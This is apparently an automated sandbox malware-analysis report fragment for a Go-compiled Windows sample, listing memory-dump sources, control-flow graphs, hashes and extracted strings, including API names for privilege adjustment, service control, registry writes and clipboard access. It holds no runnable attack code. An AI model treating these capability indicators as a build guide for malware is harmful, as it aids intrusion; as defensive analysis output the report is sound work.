                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxe$" not supported for cpu option "end outside usable address spacenumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt$", missing CPU supportbytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left ov$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeMiddle East Standard TimeNew Zealan$GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWbase outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspin$GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeMapIter.Key called before NextPacific Standard Time (Mexico)QueryServiceDynamicInformationSetSecurityDescriptorRMControlSetupDiCreateDeviceI$GODEBUG: value "GdipDisposeImageGetClipboardDataGetComputerNameWGetConsoleTitleWGetConsoleWindowGetCurrentThreadGetDesktopWindowGetFullPathNameWGetGUIThreadInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetModuleHandleWGetNamedPipeInfoGetN$cpu.
                      • API String ID: 0-3187961178
                      • Opcode ID: 040a7d6af234d2ade2207bda46b48ec5a1bfef2efbe5246acdf7742b3a351bce
                      • Instruction ID: cded1389be6dad47dcee4bfbbac6b3f9bd1feba758c200bfa11c2f02ef6c1e1c
                      • Opcode Fuzzy Hash: 040a7d6af234d2ade2207bda46b48ec5a1bfef2efbe5246acdf7742b3a351bce
                      • Instruction Fuzzy Hash: CBC1D462608B84C1DA50EF61F4403AAA76BF386BD0F544626EB8D0BB5ACF7CD492C754

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1270 6bf360-6bf380 1271 6bf46c-6bf47f call 6b2d80 1270->1271 1272 6bf386-6bf392 1270->1272 1281 6bf480-6bf484 1271->1281 1274 6bf3c9 1272->1274 1275 6bf394-6bf398 1272->1275 1276 6bf3d0-6bf460 call 6b4520 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4b20 call 6b4780 call 6b45a0 call 6b2d80 1274->1276 1278 6bf39a-6bf3bd 1275->1278 1279 6bf3c0-6bf3c3 1275->1279 1282 6bf465-6bf467 1276->1282 1279->1274 1279->1282 1284 6bf48a-6bf4a6 1281->1284 1285 6bf5bc-6bf5c5 call 6d9860 1281->1285 1282->1276 1287 6bf5aa-6bf5bb call 6b2d80 1284->1287 1288 6bf4ac-6bf4c3 1284->1288 1285->1281 1287->1285 1292 6bf510-6bf5a5 call 6b4520 call 6b4e20 call 6b4da0 call 6b4e20 call 6b4da0 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4b20 call 6b4780 call 6b45a0 call 6b2d80 1288->1292 1293 6bf4c5-6bf4c9 1288->1293 1292->1287 1293->1292 1298 6bf4cb-6bf4d7 1293->1298 1301 6bf4d9-6bf4de call 6cf8c0 1298->1301 1302 6bf4e3-6bf50f 1298->1302 1301->1302
                      Strings
                      • m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTa, xrefs: 006BF538
                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreat, xrefs: 006BF5AA
                      • ) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteObjectEnableWindowExtCreatePenExtractIconWGetAddrInfoWGetConsoleCPGetCursorPosGetLastErrorGetLengthSidGetProce, xrefs: 006BF425
                      • wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi, xrefs: 006BF46C
                      • p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWin, xrefs: 006BF56F
                      • wirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (381, xrefs: 006BF3E5
                      • wirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvi, xrefs: 006BF44F
                      • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswinspool.drvwintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not , xrefs: 006BF51D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTa$ p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWin$) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteObjectEnableWindowExtCreatePenExtractIconWGetAddrInfoWGetConsoleCPGetCursorPosGetLastErrorGetLengthSidGetProce$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreat$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswinspool.drvwintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not $wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_Hi$wirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvi$wirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (381
                      • API String ID: 0-1918591892
                      • Opcode ID: 9a25ed439c5b8db13deedd10d2e1bcdb4b543532c39a1d25a9949b051c40239a
                      • Instruction ID: 1a9d7a76bff4a31a2e5be3a8888a3e2782da6cb398dc15d72f87299fac391b13
                      • Opcode Fuzzy Hash: 9a25ed439c5b8db13deedd10d2e1bcdb4b543532c39a1d25a9949b051c40239a
                      • Instruction Fuzzy Hash: C9517CB6215B40CADB90EF10F4813DABBA6F788B80F849529EB8C07726DF38C595C754

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1339 69cae0-69cae4 1340 69caea-69cb06 1339->1340 1341 69cdb7-69cdf8 call 6d9860 1339->1341 1343 69cb0c-69cb40 1340->1343 1344 69cda5-69cdb6 call 6b2d80 1340->1344 1341->1339 1345 69cc2b-69cc47 call 694f00 1343->1345 1346 69cb46-69cb4d 1343->1346 1344->1341 1360 69cc49-69cc4e 1345->1360 1361 69cc9d-69cca6 1345->1361 1349 69cb69-69cb71 1346->1349 1350 69cb4f-69cb53 1346->1350 1354 69cc21-69cc2a 1349->1354 1355 69cb77-69cba4 1349->1355 1350->1349 1353 69cb55-69cb63 1350->1353 1353->1349 1357 69ccc5-69cda0 call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4e20 call 6b45a0 call 69ce00 * 2 call 6b2d80 1353->1357 1358 69cbaa-69cbfb 1355->1358 1359 69ccb4-69ccc0 call 6dbf60 1355->1359 1357->1344 1362 69cbfd 1358->1362 1363 69cc01-69cc08 1358->1363 1359->1357 1366 69cc53-69cc5c 1360->1366 1362->1363 1363->1366 1367 69cc0a-69cc20 1363->1367 1369 69cc5e-69cc69 1366->1369 1370 69cc82 1366->1370 1372 69cc6b-69cc6d 1369->1372 1373 69cc6f 1369->1373 1374 69cc84-69cc86 1370->1374 1372->1374 1376 69cc71-69cc80 1373->1376 1377 69cca7-69ccaf call 6dbf40 1373->1377 1378 69cc88-69cc8e call 6a2560 1374->1378 1379 69cc93-69cc9c 1374->1379 1376->1374 1377->1359 1378->1379
                      Strings
                      • +-./5<=?CLMPSUZ[\, xrefs: 0069CD0F
                      • basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindpipepop3profrootsbrksmtpsse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>A, xrefs: 0069CD4A
                      • greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close , xrefs: 0069CDA5
                      • marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value, xrefs: 0069CD90
                      • runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun, xrefs: 0069CCD4
                      • found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseCo, xrefs: 0069CCEF
                      • ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa, xrefs: 0069CD2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseCo$), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa$+-./5<=?CLMPSUZ[\$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindpipepop3profrootsbrksmtpsse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>A$greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close $marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in reflect.Value$runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun
                      • API String ID: 0-3767301102
                      • Opcode ID: bc2a81dc2e9b026981b46504628a4d073f705874683bb72522b39f13c1bc0f59
                      • Instruction ID: e2c6140a548945baba514ab36aee171482d852629c28dcfcac56543e28260460
                      • Opcode Fuzzy Hash: bc2a81dc2e9b026981b46504628a4d073f705874683bb72522b39f13c1bc0f59
                      • Instruction Fuzzy Hash: E671B0B2A18B80C6DB40DB11E4503AABB6AF785B90F445526EF8D03B6ACF3CC554CB44
                      Strings
                      • sweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: un, xrefs: 006A0CAF
                      • pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteOb, xrefs: 006A0C72
                      • mismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 , xrefs: 006A0C9E
                      • pacer: sweep done at heap size pattern contains path separatorreflect: Len of non-array type resetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds, xrefs: 006A0BF0
                      • MB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNotifyWinEventOpenSCManagerWOther_ID_StartPattern_SyntaxPdhAddCounterWProcess32NextWQuotation_MarkRCodeNameErrorRegSetValueExWReleaseCaptureSHGetFileInfoWScreenToClientSetConsoleModeSetFilePointerSetPixel, xrefs: 006A0C13
                      • MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointNtSetInformationProcessQueryServiceLockStatusWQyzylorda Standard TimeRegNotifyChangeKeyValueRegisterRawInputDevicesRemoveFontMemResourceExSHGetSpecialFolderPathWSetEnvi, xrefs: 006A0C3B
                      • pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdin12207031256103515625AdditionalAlphaBlendBad varintBeginPaintCancelIoExChorasmianClassCHAOSClassCSNETCombineRgn, xrefs: 006A0C56
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdin12207031256103515625AdditionalAlphaBlendBad varintBeginPaintCancelIoExChorasmianClassCHAOSClassCSNETCombineRgn$ pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllChooseColorWCoCreateGuidCreateBitmapCreateEventWCreateMutexWDeleteOb$MB during sweep; swept Marquesas Standard TimeMauritius Standard TimeNoncharacter_Code_PointNtSetInformationProcessQueryServiceLockStatusWQyzylorda Standard TimeRegNotifyChangeKeyValueRegisterRawInputDevicesRemoveFontMemResourceExSHGetSpecialFolderPathWSetEnvi$MB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoNotifyWinEventOpenSCManagerWOther_ID_StartPattern_SyntaxPdhAddCounterWProcess32NextWQuotation_MarkRCodeNameErrorRegSetValueExWReleaseCaptureSHGetFileInfoWScreenToClientSetConsoleModeSetFilePointerSetPixel$mismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 $pacer: sweep done at heap size pattern contains path separatorreflect: Len of non-array type resetspinning: not a spinning mruntime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds$sweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: un
                      • API String ID: 0-52867806
                      • Opcode ID: f31152090230a5f3d088e46839c2ca08d208c846f49503cded14f7c8c5b691c5
                      • Instruction ID: 4b34930d243d2ab6bec6a4e94d7929a542ae50d79f646f08e841f320242221e8
                      • Opcode Fuzzy Hash: f31152090230a5f3d088e46839c2ca08d208c846f49503cded14f7c8c5b691c5
                      • Instruction Fuzzy Hash: 1B419F75619B41CAEB40EF14F49039AB766FB89740F805529EB8E07B66DF3CC981CB14
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: PowerReg$gisterSu$ication$powrprof$rof.dll$spendRes$umeNotif
                      • API String ID: 0-941992356
                      • Opcode ID: e2cfe4f5c8bccca922ee199990d5c7475819ad222252fa51fa8447dd3ac3b394
                      • Instruction ID: 82b2ce388a5f0e5075e4cb1c19e9ab49f31ac101ce39f4cfc3f68cacc52ee02f
                      • Opcode Fuzzy Hash: e2cfe4f5c8bccca922ee199990d5c7475819ad222252fa51fa8447dd3ac3b394
                      • Instruction Fuzzy Hash: 4E3147B2608B8085D660EB11F44039AB7A6F7867C4F94802AEBDD47B6ADF3CC554CB00
                      Strings
                      • runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18syntax e, xrefs: 0069230A, 006923AF
                      • with GC prog476837158203125<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCallWindowProcWCreateHardLinkWCreatePopupMenuCreateWindowExWDeviceIoControlDialogBoxParamWDragAcceptFilesDrawThemeTextExDuplicateHandleExcludeClipRectFailed to find Faile, xrefs: 006922F4
                      • of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHE, xrefs: 00692365
